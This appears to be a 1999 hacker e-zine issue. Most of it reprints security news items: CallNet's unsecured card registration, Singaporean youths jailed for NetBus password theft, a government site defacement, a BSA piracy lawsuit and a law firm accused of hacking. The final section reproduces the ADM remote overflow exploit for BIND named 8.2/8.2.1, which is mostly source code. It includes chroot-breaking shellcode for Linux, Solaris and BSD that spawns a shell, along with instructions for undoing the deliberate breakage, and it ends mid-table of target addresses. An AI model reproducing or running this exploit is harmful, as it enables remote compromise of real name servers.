http://www.hackernews.com/ contributed by skalor TooRcon Computer Security Expo is proud to announce that the keynote speaker for TooRcon 2000 will be Simple Nomad of Nomad Mobile Research Center. Simple Nomad will discuss the future of hacking as we approach the new millennium. TooRcon http://www.toorcon.com Nomad Mobile Research Center http://www.nmrc.org HNN Cons Page - more con information http://www.hackernews.com/cons/cons.html @HWA 46.0 Distributed Attempt to Break 56bit CS-Cipher ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by x-empt Similar to projects from distributed.net and SETI@Home, this project promises 10,000 Euros (roughly $10,500) to whoever finds the correct encryption key. DCypher.Net, accepting CS Group's CS-Cipher challenge, will attempt to break their 56 bit key using a brute force attack in a distributed computing effort. Currently the Win32 clients are out and a Linux version will be out shortly. (Hmmmmm no one has started an HNN team yet.) Dcypher.net http://www.dcypher.net/ @HWA 47.0 CallNet Admits to Security Blunder ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The UK based toll-free ISP CallNet 0800 admitted that the financial security of thousands of their subscribers was compromised after the VeriSign digital verification system that was meant to secure their on line transactions did not arrive on time. The online registration which required users to enter their credit card information to make available the discounts in 0800's services, went up last Wednesday and was only taken down this week. The UK Register http://www.theregister.co.uk/991110-000015.html Posted 10/11/99 1:56pm by Tim Richardson Security hole found at CallNet 0800 CallNet 0800 compromised the financial security of thousands of Net users last week after it admitted that its online registration system was not totally secure. Although the toll-free ISP maintains there was never a problem with its servers, it has revealed that the transaction process between the user and CallNet 0800 was not secure. The registration system that allowed people to register their credit card and personal details online went live last Wednesday and was only shut down this week. Net users need to register their credit card details with CallNet 0800 to take advantage of cut-price telephone calls. Keith Goodyear, VP of CallNet UK said the episode was an "oversight" by the company. The problem arose because the VeriSign digital certification system that would have secured the online transactions was not delivered on time, claimed Goodyear. CallNet is still waiting for the VeriSign certificate and has disconnected the online sign-up service until it arrives and is in place. "The chances of anyone's details being hacked [en route] are minimal," said Goodyear, adding that there had been no reports of any security breaches. But CallNet's apparent lackadaisical approach to security has angered some people. One reader, who asked not to be named, said he was so worried when he found out he intended to cancel his credit card just in case his security has been compromised. Elsewhere, Simon Lofthouse, a spokesman for Britain's first digital certification authority, Inter Clear Services, said: "At best this is careless, at worst negligent." While Lofthouse agreed with Goodyear that the chances of people's personal details being hacked were slim, he said it was simply too much of a risk to take. "Chances are they wouldn't get hit, but what if they had? It's not just their reputation that goes the drain, it is the whole industry [that has to carry the can]." ® @HWA 48.0 Singapore Pair Sentenced After Posting Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Pang Soon Chen, 19, and David Kok Tuck Whye, 22, of Singapore, have been sentenced for 8 and 22 months in jail respectively after pleading guilty to stealing the user names and passwords of SingNet customers and students at the National University of Singapore. This password theft was apparently accomplished using NetBus. The pair then posted the names and passwords they had stolen to the internet. IT @ Asia One http://it.asia1.com.sg/html/news/news004_19991111.html 2 youths jailed for hacking rampage 54 Became Their Victims By CHANG AI-LIEN TWO youths were yesterday jailed for hacking into the computer systems of Internet users and posting their passwords on a public website. Pang Soon Chen, 19, was sentenced to 15 months' jail while David Kok Tuck Whye, 22, was jailed eight months after they pleaded guilty to the crimes. Pang and Kok obtained the passwords of SingNet and National University of Singapore Internet account holders illegally, used some of these accounts to surf and posted some passwords publicly on "Sicknet", a website hosted in the US. The district court heard that the youths had known each other since 1997. In December last year, Kok told Pang that he was having problems with his personal computer system -- it would shut down for no apparent reason or the CD-ROM tray would eject itself. Pang found out that Kok's system had been hacked into by a Netbus program. He then downloaded the program from a website and told Kok about it. Pang and Kok used the program to get the names and passwords of their victims, by connecting it to users' computer systems and executing certain commands. Pang then designed the Sicknet webpage to show off his capabilities and posted a list of SingNet user names and passwords in it. Kok then suggested that he should add more names to the page to give the impression that it had been created by a group of people. Pang sent mass messages through the Internet Relay Chat inviting people to visit the page, and it caught the attention of SingNet because of its similarity to SingNet's own webpage. The duo was arrested in March this year. Pang, unemployed, had faced 85 charges, including unauthorised access to computer materials and services, and unauthorised disclosure of access code. Kok, a Nanyang Academy of Fine Arts student then, had faced 26 similar or related charges. Calling for a deterrent sentence, Deputy Public Prosecutor Christopher Ong referred to Chief Justice Yong Pung How's recent landmark decision which sent a teenage hacker to a four-month jail term. In this case, he said the two culprits had gone on a rampage, hacking the computer systems of a total of 54 victims, and the website was created to show off their prowess. "The arrogance and maliciousness of the accused persons is self-evident." Yesterday, the duo showed no emotion when District Judge F.G. Remedios sentenced them to jail. Straits Times @HWA 49.0 Singapore Agencies to Investigate Defacement of Government Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lamer The Ministry of Law's Integrated Land Information Service in Singapore shut down its web site pending an investigation. The web site was defaced earlier this week. The National Computer Board (NCB) and the Singapore Computer Response Team (SingCert) will work with National Computer Systems (NCS) during the investigation. IT @ Asia One http://it.asia1.com.sg/html/news/news001_19991111.html Mirror of Defaced Page - provided by Attrition.org http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg/ IT @ Asia One; Govt web server shut down after hacker strike By CHONG CHEE KIN A GOVERNMENT Internet server here has been shut down for investigations after it was hacked into and a home page defaced on Tuesday. The site is the Ministry of Law's Integrated Land Information Service (Inlis) on the Internet. The service gives details about land in Singapore, and allows users to pinpoint locations on a map and print them out. The home page was defaced at about 6 pm, the ministry said yesterday, in response to questions. In a statement, it said the Inlis operator, National Computer Systems (NCS), shut down the web server when it found out that the home page had been defaced. "Only the main page of the public website was defaced. Other systems, transaction records and the data on Inlis were not affected." Reassuring the users of the system, it stressed that the transactions done on Inlis were not compromised. The National Computer Board (NCB) and the Singapore Computer Response Team (SingCert) were helping NCS in investigating the incident. The ministry added that NCS had lodged a police report. The operator had indicated that Inlis services would resume as soon as possible. This is the third such attack on government or Singapore-related websites in two months. When contacted yesterday about this and the measures being taken, the NCB said the incidents showed the risk the world faced as computers and IT became an integral part of life. Hacking was a continual problem as new loopholes were found every day. In a statement, it said: "The challenge for us is to stay vigilant, to keep abreast of and apply the latest available measures to deal with security problems. "This is a continuing challenge that all website administrators will have to cope with." It added that the websites it managed were checked and updated with the latest security software. But protective measures could not take up too much resources or made it unnecessarily inconvenient for the public to access services. The NCB added that it had set up SingCert -- a computer security team -- in 1997 to help Singapore in the detection and prevention of security-related incidents on the Internet. It was also working closely with the police on the recent incidents. The board said hacking was a serious crime and it hoped investigations would be completed soon and the culprits brought to book. Straits Times @HWA 50.0 BSA Targets IRC For Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by arab_terrorist9 The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel. Business Software Alliance http://www.bsa.org/pressbox/enforcement/index.html?/pressbox/enforcement/942331921.html SOFTWARE WATCHDOG ATTACKS CYBERPIRACY BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in California and Michigan Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel. In the past week, under the supervision of U.S. Marshals, BSA carried out unannounced inspections of computer equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to $100,000 per copyrighted work infringed. "Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger. The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites and working closely with law enforcement to promote criminal prosecutions. "This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to commit copyright infringement had better know that the law gives them no quarter," continued Kruger. **Since 1988, the Business Software Alliance (BSA) has been the voice of the world's leading Software developers before governments and with consumers in the international marketplace. Its members represent the fastest growing industry in the world. BSA educates computer users on software copyright; advocates public policy that fosters innovation and expands trade opportunities; and fights software piracy. BSA worldwide members include Adobe, Apple, Attachmate, Autodesk, Bentley Systems, Corel Corporation, Lotus Development, Macromedia, Microsoft, Network Associates, Novell, Symantec and Visio. BSA websites: www.bsa.org; www.nopiracy.com.** @HWA 51.0 Law Firm Sued Over Possible Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Once again the mainstream media is a little slow on the uptake. Internetnews.com is finnally reporting on a story that HNN mentioned over a month ago. Moore Publishing of Pennsylvania is seeking more than $10 million dollars in damages from the Washington based legal firm of Steptoe & Johnson. The suit alleges that an employee of Steptoe & Johnson attempted to break in to the computer systems of Moore Publishing. Steptoe has vehemently denied the charges but Moore claims that they have logs that will prove their case. The attacks appear to have been launched as retaliation when Moore Publishing registered the Internet address steptoejohnson.com. Internet News http://www.internetnews.com/bus-news/article/0,1087,3_237441,00.html HNN Archive for September 28, 1999 http://www.hackernews.com/arch.html?092899#3 Internet News; Law Firm Accused of Cyberattack in Domain Dispute November 11, 1999 By Brian McWilliams InternetNews.com Correspondent Business News Archives Steptoe and Johnson, a leading Washington, D.C., law firm, is accused of trying to settle a domain dispute by launching a cyberwar against a cybersquatter that registered its name. Steptoe is accused of hacking into a server operated by Moore Publishing Co., which operates an information service for investigators called Dig Dirt. Moore has filed a lawsuit in US District Court against Steptoe, alleging that the law firm repeatedly attempted to hack into its server in August and later launched a denial of service attack against it. The complaint also alleges that a Steptoe employee used a hijacked Internet account to post a message in newsgroups defaming Moore. Moore is seeking 10 million dollars in damages against Steptoe. According to Rodney Sweetland, the attorney representing Moore, the attacks appear to have been launched as retaliation when his client registered the Internet address steptoejohnson.com. "If they contended that my client violated the Lanham Act or was a cybersquatter, there are legitimate means to take care of that. But hacking and denial of service attacks are not part of the legitimate means of dealing with it," Sweetland said. Sweetland said that Steptoe has not initiated a domain dispute with Network Solutions (NSOL). Steptoe officials were not available for comment. A speculative cybersquatter, Moore has also registered several other domains that include the names of well known law firms, including kpmgpeatmarwick.com and kirklandellis.com. @HWA 52.0 New E-Zine Issues Released ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by phonepunx and set-fw Phone Punx Magazine #3 has been released with articles on Caller ID, Trunked radio, ANI and more. The newest release of the veteran H/P/C/V Spanish ezine Saqueadores Edición Técnica is now available. This issue features articles on Quantum Crypto, Hacking PacketShaper, Tempest, UnderCon and a lot more. Phone Punx Magazine #3 http://fly.to/ppn Saqueadores Edición Técnica http://www.set-ezine.org @HWA 53.0 'Fixed' version of the new ADM-BIND exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew. 1999 * All Rights Reserved * * This module may not be used, published, distributed or archived without * the written permission of the ADM Crew. Please contact your local sales * representative. * * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez * * "a misanthropic anthropoid with nothing to say" * * thanks to stran9er for sdnsofw.c * * Intel exploitation is pretty straightforward.. should give you a remote * shell. The shellcode will break chroot, do a getpeername on all open * sockets, and dup to the first one that returns AFINET. It also forks and * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a * bit more complicated.. we are going through a well trodden part of the * code, so we don't get the context switch we need to have it populate the * register windows from the stack. However, if you just hammer the service * with requests, you will quickly get a context switch at the right time. * Thus, the SPARC shellcode currently only breaks chroot, closes current * fd's and runs a command. * Also, the NetBSD shellcode doesn't break chroot because they stop the * dir tricks. Of course, they allow mknods in chrooted environments, so * if named is running as root, then it still might be expoitable. * The non-exec stack patch version returns into a malloc'ed buffer, whose * address can vary quite alot. Thus, it may not be as reliable as the other * versions.. * * We broke this just a little in order to raise the bar on using it * (just slightly).. If you'd like to test it on your own box, put a shell * in /adm/sh, or /adm/ksh for solaris on the target machine. * * This version: replaced 0x61,0x64,0x6d with 0x62,0x69,0x6e tnx Aphex. * shell code where BIN should have been located was replaced with ADM * simply replace the ADM code with BIN and you have a working copy. * * Note that you need ownership of an NS or have some way of fooling an NS to * query your ip in order to run this exploit successfully. * if you dunno what an NS is you're too lost to use this. - Cruciphux */ #include #include #include #include #include #include #include #include #include #include #include #include #include char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73, 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 